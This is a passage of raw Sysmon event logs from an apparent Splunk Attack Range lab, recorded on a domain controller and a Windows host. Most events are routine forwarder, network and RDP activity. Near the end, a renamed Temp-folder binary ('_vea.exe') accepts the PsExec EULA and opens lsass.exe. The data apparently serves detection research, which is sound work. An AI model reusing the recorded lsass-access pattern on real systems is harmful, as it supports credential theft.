23542300x8000000000000000294627Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:09.176{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F93F45DC150DAE6F2ADA1551B686060,SHA256=AB70FDDCD221730C1DC1B8B0BD6DAFE171136F0D6E9CDF12D8046565F9CD5B41,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218874Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:08.624{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51486-false10.0.1.12-8000- 354300x8000000000000000218873Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:08.371{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx59740-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000218872Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:10.847{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61EAD7602151CB255F67EA142D661E4F,SHA256=D7FBB066FBE1F053FED9EC50DA9B35609BA3C092D52CF1B534FB9E2AA6594F23,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294630Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:08.913{C8EA50B7-F11F-6215-1200-000000003802}8C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local123ntpfalse20.101.57.9-123ntp 23542300x8000000000000000294629Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:10.193{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F50B6255D5311FB8C5F0B0954F8BCB62,SHA256=95A141C963A2BA03B56DC1A0D8F600573370939A95730DF5A9393EFE615FD298,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218876Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:11.878{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF2420E6A98DF7E8C5074811AE5C041D,SHA256=4E275F938FE6CF148B7A5E87EDB920424002E99BEBAA0267EB151B07FA405C44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294631Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:11.208{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29A70D9B71CC9D50BC206B21713F756A,SHA256=EBC151FE73AA05697812DF94C1E51A6AAE553EDAC102E8A835F1FD30AB681F12,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218875Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:11.238{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=657390F65715639F90E066EB5E8326BC,SHA256=19C92B14C117D582FEC7C75F7A31243017550B64A87EA6CFAA9F450429761262,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218877Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:12.894{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=265837747320D5AB9F407D1D36786937,SHA256=17CF128D99F351B16F79B0C0E898A5B029F38F7EF8C895342B0EA9FF5439A155,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294634Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:11.096{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local56365- 354300x8000000000000000294633Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:10.581{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49159-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000294632Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:12.222{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4D2A7FA2B3C8684B0EFFFA3481012F2,SHA256=AA4812F9C61A36DB4E041C6503A9BBCBD294F846186E2C6A1F23ABF0FD095FAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294635Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:13.238{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66D3F0CC8D0E489DC94A3F590940C164,SHA256=E0079723C7393D9A4F0C0EC61AF350C663FD40AA9549F77ED8FACE906A7601B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294636Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:14.253{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F66C0A30F6548740DD9A60DA9B83654,SHA256=BDCD8D9DE269DCFEC1335D9A25E1EC8C4CA1217A31CD7F4B8C8F014C926E3F3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218880Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:14.722{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A5AC7378BBEA69AC33D5AC82A5B771EE,SHA256=70C4C79FEFB22FB0C62B92B368389B816E87438A510380116B3653478E576763,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218879Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:14.081{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9617F981BBDE0764E24BDCFC78985C8D,SHA256=65DF9910B0778FA9E2E3ED99989A35114F76D42E1AEF7354A221F2C7A11C6468,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218878Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:11.955{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx60771-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000294637Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:15.272{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1315B514BFB67E32F2AAC220AC1AEC5F,SHA256=1A9EC433CF97F4DA4C34FB02EA1D737CA5B827E3770C66EBB007E307D3B8C9D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218881Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:15.128{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F753DDE63BCFB061757C14B3DFFBEFC,SHA256=86628C413CCFC30CD5873BF329D8DEF876E2D0F8B17FD51AB3805885FE84CD2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294638Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:16.290{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5580C345B610054CFDA6165973C2A272,SHA256=020D117BFE966F7BF7147770BF7AD3176A350AE28AE64DD27C8736BC267B0EA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218884Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:16.616{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-146MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218883Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:13.654{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51487-false10.0.1.12-8000- 23542300x8000000000000000218882Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:16.144{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3C7CF208630DF4CFD33650D424EAEF4,SHA256=62CC9FB7E797247AB1255E62DB862665DDD8C76C0893C2679F79FF4A25CF60BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294639Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:17.321{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6BB6B1D3C3C9D656B9605E349D02746C,SHA256=30715F2246796D54BE02070FC3F2FA2E022F56E928915EE43071DA6367A50761,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218887Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:17.614{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-147MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218886Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:15.160{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx62344-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000218885Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:17.160{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=308BEC865E8F562ACC0442FAA3F73EE5,SHA256=5CCBA07AB7B191C4A7601D13A3989FD45BEFDBA87096844A5B14CBC3104DD333,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294641Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:18.336{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A74DCEF411FA782811F03688FE844A0,SHA256=9C91F8FAAE745DC5930554C2E301F3DDF5F08C6600FE3EF384E91244A71ED1FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218889Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:18.363{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A9DE956A19FB158AE273CE209A411150,SHA256=8463662C8E32ED21FE41F4964E2BE812B496944C886EC12BC886CF2E71FA5DAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218888Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:18.176{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6419C81934DF597C0A030513AFFC527C,SHA256=1E76D3FECF158C9BF2A9AD2D9B20354E226D95FE4EA01998D5D95F80E9ADB77E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294640Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:15.664{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49160-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000294672Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:19.905{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1477-6216-A006-000000003802}6908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294671Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:19.890{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-1477-6216-A006-000000003802}6908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294670Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:19.890{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1477-6216-A006-000000003802}6908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000294669Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:19.899{C8EA50B7-1477-6216-A006-000000003802}6908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000294668Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:19.838{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-1477-6216-9E06-000000003802}6844C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294667Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:19.838{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-1477-6216-9E06-000000003802}6844C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000294666Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 11:03:19.773{C8EA50B7-1477-6216-9E06-000000003802}6844C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000294665Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:19.670{C8EA50B7-1477-6216-9D06-000000003802}68043356C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294664Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:19.652{C8EA50B7-F11F-6215-1000-000000003802}364764C:\Windows\system32\svchost.exe{C8EA50B7-1477-6216-9F06-000000003802}592C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294663Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:19.652{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1477-6216-9F06-000000003802}592C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294662Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:19.637{C8EA50B7-1477-6216-9F06-000000003802}5925216C:\Windows\system32\conhost.exe{C8EA50B7-1477-6216-9E06-000000003802}6844C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294661Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:19.506{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1477-6216-9F06-000000003802}592C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294660Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:19.489{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1477-6216-9F06-000000003802}592C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000294659Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:19.421{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DEB232ABB3D2BB9091245EEEAA04330,SHA256=23F03D05C8746F3B974BD1A03A8DD66EFF075807CD4DF32C7E6CC873AD01E548,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294658Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 